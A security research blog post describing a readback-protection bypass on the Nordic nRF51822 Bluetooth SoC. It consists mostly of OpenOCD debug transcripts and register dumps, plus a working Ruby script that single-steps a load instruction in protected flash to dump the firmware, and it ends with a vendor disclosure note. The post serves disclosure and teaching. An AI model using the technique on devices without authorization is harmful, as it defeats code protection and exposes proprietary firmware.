Thursday, November 5, 2015

Firmware dumping technique for an ARM Cortex-M0 SoC

by Kris Brosch

One of the first major goals when reversing a new piece of hardware is getting a copy of the firmware. Once you have access to the firmware, you can reverse engineer it by disassembling the machine code.

Sometimes you can get access to the firmware without touching the hardware, for example by downloading a firmware update file. More often, you need to interact with the chip where the firmware is stored. If the chip has an accessible debug port, it may allow you to read the firmware through that interface. However, most modern chips have security features that, when enabled, prevent firmware from being read through the debugging interface. In these situations, you may have to resort to decapping the chip, or to introducing glitches into the hardware logic by manipulating inputs such as power or clock sources and leveraging the resulting behavior to bypass these security implementations.

This blog post is a discussion of a new technique that we've created to dump the firmware stored on a particular Bluetooth system-on-chip (SoC), and how we bypassed that chip's security features to do so by only using the debugging interface of the chip. We believe this technique is a vulnerability in the code protection features of this SoC and as such have notified the IC vendor prior to publication of this blog post.

The SoC

The SoC in question is a Nordic Semiconductor nRF51822. The nRF51822 is a popular Bluetooth SoC with an ARM Cortex-M0 CPU core and built-in Bluetooth hardware. The chip's manual is available here.

Chip security features that prevent code readout vary in implementation among the many microcontrollers and SoCs available from various manufacturers, even among those that use the same ARM cores. The nRF51822's code protection allows the developer to prevent the debugging interface from reading either all of the code and memory (flash and RAM) sections, or just a subsection of these areas. Additionally, some chips have options to prevent debugger access entirely. The nRF51822 doesn't provide such a feature to developers; it just disables memory accesses through the debugging interface.

The nRF51822 has a serial wire debug (SWD) interface, a two-wire (in addition to ground) debugging interface available on many ARM chips. Many readers may be familiar with JTAG as a physical interface that often provides access to hardware and software debugging features of chips. Some ARM cores support a debugging protocol that works over the JTAG physical interface; SWD is a different physical interface that can be used to access the same software debugging features of a chip that ARM JTAG does. OpenOCD is an open source tool that can be used to access the SWD port.

This document contains a pinout diagram of the nRF51822. Luckily the hardware target we were analyzing has test points connected to the SWDIO and SWDCLK chip pins with PCB traces that were easy to follow. By connecting to these test points with a SWD adapter, we can use OpenOCD to access the chip via SWD. There are many debug adapters supported by OpenOCD, some of which support SWD.

Exploring the Debugger Access

Once OpenOCD is connected to the target, we can run debugging commands and read and write some ARM registers; however, we are prevented from reading out the code section. In the example below, we connect to the target with OpenOCD and attempt to read memory from the target chip. We reset the processor, then read from address 0x00000000 and from the address held in the program counter (pc) register after reset (0x000114cc); however, nothing but zeros is returned. Of course we know there is code there, but the code protection countermeasures are preventing us from accessing it:

> reset halt
target state: halted
target halted due to debug-request, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
> mdw 0x00000000
0x00000000: 00000000
> mdw 0x000114cc 10
0x000114cc: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
0x000114ec: 00000000 00000000

We can however read and write CPU registers, including the program counter (pc), and we can single-step through instructions (we just don't know what instructions, since we can't read them):

> reg r0 0x12345678
r0 (/32): 0x12345678
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114ce msp: 0x20001bd0
> reg pc 0x00011500
pc (/32): 0x00011500
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x00011502 msp: 0x20001bd0


We can also read a few of the memory-mapped configuration registers. Here we are reading a register named "RBPCONF" (short for readback protection) in a collection of registers named "UICR" (User Information Configuration Registers); you can find the address of this register in the nRF51 Series Reference Manual:

> mdw 0x10001004
0x10001004: ffff00ff


According to the manual, a value of 0xffff00ff in the RBPCONF register means "Protect all" (PALL) is enabled (bits 15..8, labeled "B" in this table, are set to 0), and "Protect region 0" (PR0) is disabled (bits 7..0, labeled "A", are set to 1):
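The field layout just described can be checked with a few lines of Ruby. This is only a sketch: the helper name `decode_rbpconf` is made up for illustration, and it assumes that a field value of 0x00 means "enabled" and anything else means "disabled", which matches the two values discussed here.

```ruby
# Decode an RBPCONF value using the layout described in the text:
# bits 7..0 hold PR0 and bits 15..8 hold PALL.
# Assumption: a field of 0x00 means the protection is enabled.
def decode_rbpconf(value)
  pr0  = value & 0xFF
  pall = (value >> 8) & 0xFF
  { pr0_enabled: pr0 == 0x00, pall_enabled: pall == 0x00 }
end

status = decode_rbpconf(0xffff00ff)
puts "PALL enabled: #{status[:pall_enabled]}, PR0 enabled: #{status[:pr0_enabled]}"
```

For the value read from this target, the sketch reports PALL as enabled and PR0 as disabled.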


The PALL feature being enabled is what is responsible for preventing us from accessing the code section and subsequently causing our read commands to return zeros.

The other protection feature, PR0, is not enabled in this case, but it's worth mentioning because the protection bypass discussed in this article could bypass PR0 as well. If enabled, it would prevent the debugger from reading memory below a configurable address. Note that flash (and therefore the firmware we want) exists at a lower address than RAM. PR0 also prevents code running outside of the protected region from reading any data within the protected region.

Unfortunately, it is not possible to disable PALL without erasing the entire chip, wiping away the firmware with it. However, it is possible to bypass this readback protection by leveraging our debug access to the CPU.

Devising a Protection Bypass

An initial plan to dump the firmware via a debugging interface might be to load some code into RAM that reads the firmware from flash into a RAM buffer that we could then read. However, we don't have access to RAM because PALL is enabled. Even if PALL were disabled, PR0 could have been enabled, which would prevent our code in RAM (which would be the unprotected region) from reading flash (in the protected region). This plan won't work if either PALL or PR0 is enabled.

To bypass the memory protections, we need a way to read the protected data and we need a place to write it that we can access. In this case, only code that exists in protected memory can read protected memory. So our method of reading data will be to jump to an instruction in protected memory using our debugger access, and then to execute that instruction. The instruction will read the protected data into a CPU register, at which time we can then read the value out of the CPU register using our debugger access. How do we know what instruction to jump to? We'll have to blindly search protected memory for a load instruction that will read from an address we supply in a register. Once we've found such an instruction, we can exploit it to read out all of the firmware.

Finding a Load Instruction

Our debugger access lets us write to the pc register in order to jump to any instruction, and it lets us single step the instruction execution. We can also read and write the contents of the general purpose CPU registers. In order to read from the protected memory, we have to find a load word instruction with a register operand, set the operand register to a target address, and execute that one instruction. Since we can't read the flash, we don't know what instructions are where, so it might seem difficult to find the right instruction. However, all we need is an instruction that reads memory from an address in some register to a register, which is a pretty common operation. A load word instruction would work, or a pop instruction, for example.

We can search for the right instruction using trial and error. First, we set the program counter to somewhere we guess a useful instruction might be. Then, we set all the CPU registers to an address we're interested in and then single step. Next we examine the registers. If we are lucky, the instruction we just executed loaded data from an address stored in another register. If one of the registers has changed to a value that might exist at the target address, then we may have found a useful load instruction.
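The trial-and-error loop described above could be automated roughly as follows. This is a hedged sketch, not the script used for this post: `parse_registers` and `probe_instruction` are hypothetical helper names, `debug` is assumed to be any object with a `cmd(string)` method that returns OpenOCD's reply (for example a `Net::Telnet` session), and the regular expression assumes the `reg` output format shown in the transcripts in this post.

```ruby
# Registers we seed before each probe: r0..r12 plus sp.
SEED_REGISTERS = ((0..12).map { |n| "r#{n}" } + ["sp"]).freeze

# Parse the output of OpenOCD's "reg" command into { "r3" => 0x10001014, ... }.
# Lines without a value (such as the DWT registers) are skipped.
def parse_registers(text)
  text.scan(/^\s*\(\d+\)\s+(\w+)\s+\(\/\d+\):\s+0x([0-9a-fA-F]+)/)
      .map { |name, hex| [name, hex.to_i(16)] }
      .to_h
end

# Reset, jump to `pc`, seed the registers with `seed`, execute one instruction,
# and return the seeded registers whose value is no longer `seed`.
def probe_instruction(debug, pc, seed)
  debug.cmd("reset halt")
  debug.cmd(format("reg pc 0x%08x", pc))
  SEED_REGISTERS.each { |reg| debug.cmd(format("reg %s 0x%08x", reg, seed)) }
  debug.cmd("step")
  after = parse_registers(debug.cmd("reg"))
  after.select { |name, value| SEED_REGISTERS.include?(name) && value != seed }
end
```

A call such as `probe_instruction(debug, 0x000114ce, 4)` would then return a hash of the registers that the instruction at that address modified, which is the same information we pick out by eye from the register dumps.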

We might as well start at the reset vector - at least we know there are valid instructions there. Here we're resetting the CPU, setting the general purpose registers and stack pointer to zero (the address we're trying), and single stepping, then examining the registers:

> reset halt
target state: halted
target halted due to debug-request, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
> reg r0 0x00000000
r0 (/32): 0x00000000
> reg r1 0x00000000
r1 (/32): 0x00000000
> reg r2 0x00000000
r2 (/32): 0x00000000
> reg r3 0x00000000
r3 (/32): 0x00000000
> reg r4 0x00000000
r4 (/32): 0x00000000
> reg r5 0x00000000
r5 (/32): 0x00000000
> reg r6 0x00000000
r6 (/32): 0x00000000
> reg r7 0x00000000
r7 (/32): 0x00000000
> reg r8 0x00000000
r8 (/32): 0x00000000
> reg r9 0x00000000
r9 (/32): 0x00000000
> reg r10 0x00000000
r10 (/32): 0x00000000
> reg r11 0x00000000
r11 (/32): 0x00000000
> reg r12 0x00000000
r12 (/32): 0x00000000
> reg sp 0x00000000
sp (/32): 0x00000000
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114ce msp: 00000000
> reg
===== arm v7m registers
(0) r0 (/32): 0x00000000
(1) r1 (/32): 0x00000000
(2) r2 (/32): 0x00000000
(3) r3 (/32): 0x10001014
(4) r4 (/32): 0x00000000
(5) r5 (/32): 0x00000000
(6) r6 (/32): 0x00000000
(7) r7 (/32): 0x00000000
(8) r8 (/32): 0x00000000
(9) r9 (/32): 0x00000000
(10) r10 (/32): 0x00000000
(11) r11 (/32): 0x00000000
(12) r12 (/32): 0x00000000
(13) sp (/32): 0x00000000
(14) lr (/32): 0xFFFFFFFF
(15) pc (/32): 0x000114CE
(16) xPSR (/32): 0xC1000000
(17) msp (/32): 0x00000000
(18) psp (/32): 0xFFFFFFFC
(19) primask (/1): 0x00
(20) basepri (/8): 0x00
(21) faultmask (/1): 0x00
(22) control (/2): 0x00
===== Cortex-M DWT registers
(23) dwt_ctrl (/32)
(24) dwt_cyccnt (/32)
(25) dwt_0_comp (/32)
(26) dwt_0_mask (/4)
(27) dwt_0_function (/32)
(28) dwt_1_comp (/32)
(29) dwt_1_mask (/4)
(30) dwt_1_function (/32)

Looks like r3 was set to 0x10001014. Is that the value at address zero? Let's see what happens when we load the registers with four instead:
> reset halt
target state: halted
target halted due to debug-request, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
> reg r0 0x00000004
r0 (/32): 0x00000004
> reg r1 0x00000004
r1 (/32): 0x00000004
> reg r2 0x00000004
r2 (/32): 0x00000004
> reg r3 0x00000004
r3 (/32): 0x00000004
> reg r4 0x00000004
r4 (/32): 0x00000004
> reg r5 0x00000004
r5 (/32): 0x00000004
> reg r6 0x00000004
r6 (/32): 0x00000004
> reg r7 0x00000004
r7 (/32): 0x00000004
> reg r8 0x00000004
r8 (/32): 0x00000004
> reg r9 0x00000004
r9 (/32): 0x00000004
> reg r10 0x00000004
r10 (/32): 0x00000004
> reg r11 0x00000004
r11 (/32): 0x00000004
> reg r12 0x00000004
r12 (/32): 0x00000004
> reg sp 0x00000004
sp (/32): 0x00000004
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114ce msp: 0x00000004
> reg
===== arm v7m registers
(0) r0 (/32): 0x00000004
(1) r1 (/32): 0x00000004
(2) r2 (/32): 0x00000004
(3) r3 (/32): 0x10001014
(4) r4 (/32): 0x00000004
(5) r5 (/32): 0x00000004
(6) r6 (/32): 0x00000004
(7) r7 (/32): 0x00000004
(8) r8 (/32): 0x00000004
(9) r9 (/32): 0x00000004
(10) r10 (/32): 0x00000004
(11) r11 (/32): 0x00000004
(12) r12 (/32): 0x00000004
(13) sp (/32): 0x00000004
(14) lr (/32): 0xFFFFFFFF
(15) pc (/32): 0x000114CE
(16) xPSR (/32): 0xC1000000
(17) msp (/32): 0x00000004
(18) psp (/32): 0xFFFFFFFC
(19) primask (/1): 0x00
(20) basepri (/8): 0x00
(21) faultmask (/1): 0x00
(22) control (/2): 0x00
===== Cortex-M DWT registers
(23) dwt_ctrl (/32)
(24) dwt_cyccnt (/32)
(25) dwt_0_comp (/32)
(26) dwt_0_mask (/4)
(27) dwt_0_function (/32)
(28) dwt_1_comp (/32)
(29) dwt_1_mask (/4)
(30) dwt_1_function (/32)

Nope, r3 gets the same value, so we're not interested in the first instruction. Let's continue on to the second:

> reg r0 0x00000000
r0 (/32): 0x00000000
> reg r1 0x00000000
r1 (/32): 0x00000000
> reg r2 0x00000000
r2 (/32): 0x00000000
> reg r3 0x00000000
r3 (/32): 0x00000000
> reg r4 0x00000000
r4 (/32): 0x00000000
> reg r5 0x00000000
r5 (/32): 0x00000000
> reg r6 0x00000000
r6 (/32): 0x00000000
> reg r7 0x00000000
r7 (/32): 0x00000000
> reg r8 0x00000000
r8 (/32): 0x00000000
> reg r9 0x00000000
r9 (/32): 0x00000000
> reg r10 0x00000000
r10 (/32): 0x00000000
> reg r11 0x00000000
r11 (/32): 0x00000000
> reg r12 0x00000000
r12 (/32): 0x00000000
> reg sp 0x00000000
sp (/32): 0x00000000
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114d0 msp: 00000000
> reg
===== arm v7m registers
(0) r0 (/32): 0x00000000
(1) r1 (/32): 0x00000000
(2) r2 (/32): 0x00000000
(3) r3 (/32): 0x20001BD0
(4) r4 (/32): 0x00000000
(5) r5 (/32): 0x00000000
(6) r6 (/32): 0x00000000
(7) r7 (/32): 0x00000000
(8) r8 (/32): 0x00000000
(9) r9 (/32): 0x00000000
(10) r10 (/32): 0x00000000
(11) r11 (/32): 0x00000000
(12) r12 (/32): 0x00000000
(13) sp (/32): 0x00000000
(14) lr (/32): 0xFFFFFFFF
(15) pc (/32): 0x000114D0
(16) xPSR (/32): 0xC1000000
(17) msp (/32): 0x00000000
(18) psp (/32): 0xFFFFFFFC
(19) primask (/1): 0x00
(20) basepri (/8): 0x00
(21) faultmask (/1): 0x00
(22) control (/2): 0x00
===== Cortex-M DWT registers
(23) dwt_ctrl (/32)
(24) dwt_cyccnt (/32)
(25) dwt_0_comp (/32)
(26) dwt_0_mask (/4)
(27) dwt_0_function (/32)
(28) dwt_1_comp (/32)
(29) dwt_1_mask (/4)
(30) dwt_1_function (/32)

OK, this time r3 was set to 0x20001BD0. Is that the value at address zero? Let's see what happens when we run the second instruction with the registers set to 4:
> reset halt
target state: halted
target halted due to debug-request, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114ce msp: 0x20001bd0
> reg r0 0x00000004
r0 (/32): 0x00000004
> reg r1 0x00000004
r1 (/32): 0x00000004
> reg r2 0x00000004
r2 (/32): 0x00000004
> reg r3 0x00000004
r3 (/32): 0x00000004
> reg r4 0x00000004
r4 (/32): 0x00000004
> reg r5 0x00000004
r5 (/32): 0x00000004
> reg r6 0x00000004
r6 (/32): 0x00000004
> reg r7 0x00000004
r7 (/32): 0x00000004
> reg r8 0x00000004
r8 (/32): 0x00000004
> reg r9 0x00000004
r9 (/32): 0x00000004
> reg r10 0x00000004
r10 (/32): 0x00000004
> reg r11 0x00000004
r11 (/32): 0x00000004
> reg r12 0x00000004
r12 (/32): 0x00000004
> reg sp 0x00000004
sp (/32): 0x00000004
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114d0 msp: 0x00000004
> reg
===== arm v7m registers
(0) r0 (/32): 0x00000004
(1) r1 (/32): 0x00000004
(2) r2 (/32): 0x00000004
(3) r3 (/32): 0x000114CD
(4) r4 (/32): 0x00000004
(5) r5 (/32): 0x00000004
(6) r6 (/32): 0x00000004
(7) r7 (/32): 0x00000004
(8) r8 (/32): 0x00000004
(9) r9 (/32): 0x00000004
(10) r10 (/32): 0x00000004
(11) r11 (/32): 0x00000004
(12) r12 (/32): 0x00000004
(13) sp (/32): 0x00000004
(14) lr (/32): 0xFFFFFFFF
(15) pc (/32): 0x000114D0
(16) xPSR (/32): 0xC1000000
(17) msp (/32): 0x00000004
(18) psp (/32): 0xFFFFFFFC
(19) primask (/1): 0x00
(20) basepri (/8): 0x00
(21) faultmask (/1): 0x00
(22) control (/2): 0x00
===== Cortex-M DWT registers
(23) dwt_ctrl (/32)
(24) dwt_cyccnt (/32)
(25) dwt_0_comp (/32)
(26) dwt_0_mask (/4)
(27) dwt_0_function (/32)
(28) dwt_1_comp (/32)
(29) dwt_1_mask (/4)
(30) dwt_1_function (/32)

This time, r3 got 0x000114CD. This value strongly implies we're reading memory. Why? The value is the reset vector. According to the Cortex-M0 documentation, the reset vector is at address 4, and when we reset the chip, the PC is set to 0x000114CC (the least significant bit is set in the reset vector, changing C to D, because the Cortex-M0 operates in Thumb mode).
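The relationship between the value we read and the program counter after reset is a one-bit mask. The arithmetic, with a helper name (`thumb_entry`) chosen purely for illustration, looks like this:

```ruby
# Split a vector table entry into the instruction address and the Thumb bit.
def thumb_entry(vector)
  { address: vector & ~1, thumb_bit: vector & 1 }
end

entry = thumb_entry(0x000114CD)   # value loaded from address 4
pc_after_reset = 0x000114CC       # pc reported by "reset halt"

puts format("entry address: 0x%08x, thumb bit: %d", entry[:address], entry[:thumb_bit])
puts "matches pc after reset: #{entry[:address] == pc_after_reset}"
```

Clearing bit 0 of 0x000114CD gives 0x000114CC, which is exactly the pc value OpenOCD reports after a reset.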

Let's try reading the two instructions we just were testing:

> reset halt
target state: halted
target halted due to debug-request, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114ce msp: 0x20001bd0
> reg r0 0x000114cc
r0 (/32): 0x000114CC
> reg r1 0x000114cc
r1 (/32): 0x000114CC
> reg r2 0x000114cc
r2 (/32): 0x000114CC
> reg r3 0x000114cc
r3 (/32): 0x000114CC
> reg r4 0x000114cc
r4 (/32): 0x000114CC
> reg r5 0x000114cc
r5 (/32): 0x000114CC
> reg r6 0x000114cc
r6 (/32): 0x000114CC
> reg r7 0x000114cc
r7 (/32): 0x000114CC
> reg r8 0x000114cc
r8 (/32): 0x000114CC
> reg r9 0x000114cc
r9 (/32): 0x000114CC
> reg r10 0x000114cc
r10 (/32): 0x000114CC
> reg r11 0x000114cc
r11 (/32): 0x000114CC
> reg r12 0x000114cc
r12 (/32): 0x000114CC
> reg sp 0x000114cc
sp (/32): 0x000114CC
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114d0 msp: 0x000114cc
> reg r3
r3 (/32): 0x681B4B13

The r3 register has the value 0x681B4B13. That disassembles to two load instructions, the first relative to the pc, the second relative to r3:

$ printf "\x13\x4b\x1b\x68" > /tmp/armcode
$ arm-none-eabi-objdump -D --target binary -Mforce-thumb -marm /tmp/armcode

/tmp/armcode:     file format binary


Disassembly of section .data:

00000000 <.data>:
   0:   4b13            ldr     r3, [pc, #76]   ; (0x50)
   2:   681b            ldr     r3, [r3, #0]

In case you don't read Thumb assembly, that second instruction is a load register instruction (ldr); it's taking an address from the r3 register, adding an offset of zero, and loading the value from that address into the r3 register.
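If you don't have an ARM toolchain at hand, the same two halfwords can be decoded by hand. The sketch below is not a general disassembler: it only handles the two 16-bit Thumb LDR encodings that appear in this word (the pc-relative form and the register-plus-immediate form), and the helper names are made up for illustration.

```ruby
# Split a 32-bit word read from little-endian memory into its two
# 16-bit Thumb halfwords, in execution order.
def thumb_halfwords(word)
  [word].pack("V").unpack("v2")
end

# Decode only the two LDR encodings seen in this post.
def decode_ldr(halfword)
  case halfword >> 11
  when 0b01001 # LDR Rt, [pc, #imm8 * 4]
    format("ldr r%d, [pc, #%d]", (halfword >> 8) & 0x7, (halfword & 0xFF) * 4)
  when 0b01101 # LDR Rt, [Rn, #imm5 * 4]
    format("ldr r%d, [r%d, #%d]",
           halfword & 0x7, (halfword >> 3) & 0x7, ((halfword >> 6) & 0x1F) * 4)
  else
    format("unknown (0x%04x)", halfword)
  end
end

thumb_halfwords(0x681B4B13).each do |halfword|
  puts format("%04x  %s", halfword, decode_ldr(halfword))
end
```

The low halfword (0x4b13) executes first, which is why the byte order passed to printf above is 13 4b 1b 68.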

We've found a load instruction that lets us read memory from an arbitrary address. Again, this is useful because only code in the protected memory can read the protected memory. The trick is that being able to read and write CPU registers using OpenOCD lets us execute those instructions however we want. If we hadn't been lucky enough to find the load word instruction so close to the reset vector, we could have reset the processor and written a value to the pc register (jumping to an arbitrary address) to try more instructions. Since we were lucky though, we can just step through the first instruction.
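The test we applied by hand, running the same instruction with two different seed values and checking whether the result changes, can be sketched as a small helper. The name `seed_dependent_registers` is hypothetical, and the inputs are the changed-register values taken from the register dumps above. A differing result only suggests a load; an arithmetic instruction on a seeded register would also pass this check, so a hit still needs the kind of confirmation we did with the reset vector.

```ruby
# Given the registers changed by one instruction under two different seed
# values, return the registers whose result depended on the seed.
def seed_dependent_registers(changed_a, changed_b)
  (changed_a.keys & changed_b.keys).select { |reg| changed_a[reg] != changed_b[reg] }
end

# First instruction: r3 got the same value for seeds 0 and 4.
first = seed_dependent_registers({ "r3" => 0x10001014 }, { "r3" => 0x10001014 })
# Second instruction: r3 differed between seeds 0 and 4.
second = seed_dependent_registers({ "r3" => 0x20001BD0 }, { "r3" => 0x000114CD })

puts "first instruction:  #{first.inspect}"
puts "second instruction: #{second.inspect}"
```

With the values from this post, the first instruction yields an empty list and the second yields r3.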

Dumping the Firmware

Now that we've found a load instruction that we can execute to read from arbitrary addresses, our firmware dumping process is as follows:
  1. Reset the CPU
  2. Single step (we don't care about the first instruction)
  3. Put the address we want to read from into r3
  4. Single step (this loads from the address in r3 to r3)
  5. Read the value from r3
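Here's a Ruby script to automate the process:

#!/usr/bin/env ruby
# Dumps flash by repeatedly executing the "ldr r3, [r3, #0]" instruction found above.
# Newer Ruby versions may need the net-telnet gem installed for this require to work.
require 'net/telnet'

# OpenOCD's command interface is reachable via telnet on localhost.
debug = Net::Telnet::new("Host" => "localhost", "Port" => 4444)

# Open in binary mode so the packed words are written unmodified.
dumpfile = File.open("dump.bin", "wb")

# Walk addresses 0x00000000...0x00040000 one 32-bit word at a time.
((0x00000000/4)...(0x00040000)/4).each do |i|
  address = i * 4
  debug.cmd("reset halt")
  debug.cmd("step")                              # skip the first instruction
  debug.cmd("reg r3 0x#{address.to_s 16}")       # address to read
  debug.cmd("step")                              # execute ldr r3, [r3, #0]
  response = debug.cmd("reg r3")
  value = response.match(/: 0x([0-9a-fA-F]{8})/)[1].to_i 16
  dumpfile.write([value].pack("V"))              # store as little-endian
  puts "0x%08x: 0x%08x" % [address, value]
end

dumpfile.close
debug.close

The Ruby script connects to the OpenOCD user interface, which is available via a telnet connection on localhost. It then loops through addresses that are multiples of four, using the load instruction we found to read data from those addresses.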
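One quick way to sanity-check the resulting file is to compare its first two words against the values we already read by hand: 0x20001BD0 at address 0 (which matches the msp value after reset) and 0x000114CD at address 4 (the reset vector). The sketch below assumes the dump was written as little-endian words to dump.bin, as the script above does; `vector_table` and `EXPECTED_VECTORS` are names introduced only for this example.

```ruby
# Return the first two little-endian words of a dump: the initial stack
# pointer (address 0) and the reset vector (address 4).
def vector_table(dump_bytes)
  initial_sp, reset_vector = dump_bytes.unpack("V2")
  { initial_sp: initial_sp, reset_vector: reset_vector }
end

# Values observed earlier in this post through the load instruction.
EXPECTED_VECTORS = { initial_sp: 0x20001BD0, reset_vector: 0x000114CD }.freeze

# Only runs the check if a dump is present in the current directory.
if File.exist?("dump.bin")
  table = vector_table(File.binread("dump.bin", 8))
  if table == EXPECTED_VECTORS
    puts "vector table matches"
  else
    puts format("unexpected vector table: %p", table)
  end
end
```

A mismatch here would suggest that a step or register read failed partway through the dump, or that the file was not written in binary mode.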

Vendor Response

IncludeSec contacted NordicSemi through its customer support channel and provided a copy of this blog post. From NordicSemi customer support: "We take this into consideration together with other factors, and the discussions around this must be kept internal."

We additionally reached out to the only engineer who had security in his title and he didn't really want a follow-up Q&A call or further info and redirected us to only talk to customer support. So that's about all we can do for coordinated disclosure on our side.


Conclusion

Once we have a copy of the firmware image, we can do whatever disassembly or reverse engineering we want with it. We can also now disable the chip's PALL protection in order to more easily debug the code. To disable PALL, you need to erase the chip, but that's not a problem since we can immediately re-flash the chip using the dumped firmware. Once the chip has been erased and re-programmed with the protection disabled, we can freely use the debugger to read and write RAM, set breakpoints, and so on. We can even attach GDB to OpenOCD and debug the firmware that way.

The technique described here won't work on all microcontrollers or SoCs; it only applies to situations where you have access to a debugging interface that can read and write CPU registers but not protected memory. Despite the limitation though, the technique can be used to dump firmware from nRF51822 chips and possibly others that use similar protections. We feel this is a vulnerability in the design of the nRF51822 code protection.

Are you using other cool techniques to dump firmware? Do you know of any other microcontrollers or SoCs that might be vulnerable to this type of code protection bypass? Let us know in the comments.

4 comments :

  1. LOL!! That's awesome - good find!

  2. This is the perfect example of "out of box" thinking. Congratulations and you got a new follower.

  3. Thank you for this article it was fun while it lasted :)
    I have tried to get firmware with your script but at some point it failed :)
    Now I cannot connect to bracelet but I will try with different programmer and with JTAG.
    Here is my tryout ...
    http://www.lemilica.com/hacking-smart-bracelet-wristband/
